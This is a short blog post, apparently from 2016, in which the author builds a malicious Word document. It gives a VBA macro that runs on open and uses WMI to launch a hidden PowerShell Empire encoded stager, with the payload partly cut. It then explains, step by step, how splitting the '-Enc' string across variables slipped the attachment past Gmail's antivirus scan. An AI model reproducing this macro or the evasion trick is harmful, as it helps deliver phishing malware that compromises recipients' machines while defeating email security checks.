Note: This was posted in January 2016
So today whilst doing some practice on creating trojanised Microsoft Word documents, I came across an issue. Gmail by default has a virus check on attachments if you want to send a malicious attachment out.
To insert a payload into the word document, I firstly created a template which looked like the below.
After doing so, creating the macro using AutoOpen and Document_Open was trivial. I made use of a powershell one liner payload along with process creation to launch powershell using an encrypted Payload. Using Powershell Empire’s default copy and paste macro stager, this is detected.
*Sub AutoOpen() Debugging End Sub* *Sub Document_Open() Debugging End Sub* *Public Function Debugging() As Variant Dim Str As String str = “powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP” str = str + “QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB”* *<snip to save space and sensitivity>* *str = str + “ATwBJAG4AJwAnACkA” Const HIDDEN_WINDOW = 0 strComputer = “.” Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2″) Set objStartup = objWMIService.Get(“Win32_ProcessStartup”) Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2:Win32_Process”) objProcess.Create str, Null, objConfig, intProcessID End Function*
What I did was begin removing lines of code and kept uploading repeatedly to Gmail attachments until it would no longer detect it as a virus.
I made adjustments to the payload trying to identify which string or pattern the AV was picking up. I quickly realised that it was the fact that the “-Enc” was part of the payload.
To resolve this, I split the “-Enc” string into “-E” and “nc” then concatenated it together. For example:
*Dim Yops As String* *Yops = “powershell.exe -Enc PAYLOADHERE”*
This would be translated to the following:
*Dim Yops As String* *Yops = “powershell.exe -E”* *Yops = Yops + “nc PAYLOADHERE”*
However, this technique did not work. My next approach to thinking about it was that the “Yops” string is checked at the end after all the concatenation to determine whether “-Enc” is followed by “powershell.exe”. Therefore what I did was the following and it bypassed the virus checks.
*Dim Yops As String* *Yops = “powershell.exe -E”* *Yolo = “nc PAYLOAD”* *Yops = Yops + Yolo + “HERE”*
This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing.